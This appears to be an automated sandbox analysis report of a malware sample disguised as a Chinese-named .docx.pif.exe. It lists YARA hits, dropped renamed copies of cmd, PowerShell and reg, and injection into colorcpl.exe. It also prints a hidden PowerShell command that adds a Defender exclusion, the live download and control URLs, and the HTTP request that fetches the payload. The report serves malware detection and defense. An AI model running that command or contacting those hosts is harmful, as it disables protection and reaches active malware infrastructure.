Source: Yara match | File source: C:\ProgramData\gaban\logs.dat, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.4% probability
Source: C:\Users\Public\Libraries\Pyemdbrd.PIF | Joe Sandbox ML: detected
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045B3837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,31_2_045B3837
Source: colorcpl.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match | File source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR

Privilege Escalation

Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045874FD _wcslen,CoGetObject,31_2_045874FD
Source: C:\Users\Public\ger.exe | Registry value created: NULL C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"

              Compliance

              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Unpacked PE file: 0.2.#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe.2980000.1.unpack
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknown | HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: FodHelper.pdb source: extrac32.exe, 00000012.00000002.1282544160.000001FCCC830000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000022.00000002.1389829508.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe, 00000022.00000000.1363110246.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe.18.dr
              Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000008.00000000.1264413808.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000000.1266008004.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000002.1267795392.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000000.1268349543.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000002.1277417828.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000000.1277719216.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000002.1280383467.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000002.1284778384.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000000.1280701556.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000002.1361948594.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000000.1285093557.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000000.1301865429.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000002.1305805578.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000000.1390985382.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000002.1397949450.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000002.1415158264.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000000.1400142537.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe.6.dr
              Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000016.00000000.1285526824.00007FF6C891A000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.15.dr
              Source: Binary string: easinvoker.pdbH source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: reg.pdb source: extrac32.exe, 0000000D.00000002.1276914690.00000178283A0000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000018.00000002.1302899439.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000018.00000000.1302258700.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.13.dr
              Source: Binary string: powershell.pdb source: xkn.exe, 00000016.00000000.1285526824.00007FF6C891A000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.15.dr
              Source: Binary string: cmd.pdb source: alpha.exe, 00000008.00000000.1264413808.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000000.1266008004.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000002.1267795392.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000000.1268349543.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000002.1277417828.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000000.1277719216.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000002.1280383467.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000002.1284778384.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000000.1280701556.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000002.1361948594.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000000.1285093557.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000000.1301865429.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000002.1305805578.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000000.1390985382.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000002.1397949450.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000002.1415158264.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000000.1400142537.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe.6.dr
              Source: Binary string: FodHelper.pdbGCTL source: extrac32.exe, 00000012.00000002.1282544160.000001FCCC830000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000022.00000002.1389829508.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe, 00000022.00000000.1363110246.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe.18.dr
              Source: Binary string: reg.pdbGCTL source: extrac32.exe, 0000000D.00000002.1276914690.00000178283A0000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000018.00000002.1302899439.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000018.00000000.1302258700.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.13.dr
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_029858B4
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,8_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,8_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,8_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,8_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,8_2_00007FF64B5635B8
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF64B5635B8
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,12_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,12_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,12_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,12_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,12_2_00007FF64B5635B8
              Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,14_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,14_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,14_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,14_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,14_2_00007FF64B5635B8
              Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,17_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,17_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,17_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,17_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,17_2_00007FF64B5635B8
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_04589665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_04589665
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_04589253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_04589253
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0459C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,31_2_0459C291
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,31_2_0458C34D
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,31_2_0458BD37
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045CE879 FindFirstFileExA,31_2_045CE879
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,31_2_0458880C
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458783C FindFirstFileW,FindNextFileW,31_2_0458783C
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_04599AF5 FindFirstFileW,FindNextFileW,FindNextFileW,31_2_04599AF5
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,31_2_0458BB30
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_04587C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,31_2_04587C97
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | File opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | File opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.tmp
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | File opened: C:\Users\user~1\
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | File opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | File opened: C:\Users\user~1\AppData\Local\
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | File opened: C:\Users\user~1\AppData\

              Networking

              Source: Malware configuration extractor | URLs: https://wcmanagers.com/Er9/233_Pyemdbrdpps
              Source: Malware configuration extractor | URLs: www.vipguyclassproject2024.space
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299D028 InternetCheckConnectionA,0_2_0299D028
              Source: Joe Sandbox View | IP Address: 108.170.55.202 108.170.55.202
              Source: Joe Sandbox View | ASN Name: SSASN2US SSASN2US
              Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global traffic | HTTP traffic detected: GET /Er9/233_Pyemdbrdpps HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: wcmanagers.com
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (50 identical entries in the report)
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0459663B Sleep,URLDownloadToFileW,31_2_0459663B
              Source: global traffic | DNS traffic detected: DNS query: wcmanagers.com
              Source: global traffic | DNS traffic detected: DNS query: www.vipguyclassproject2024.space
              Source: global traffic | DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: colorcpl.exe | String found in binary or memory: http://geoplugin.net/json.gp
              Source: colorcpl.exe, 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
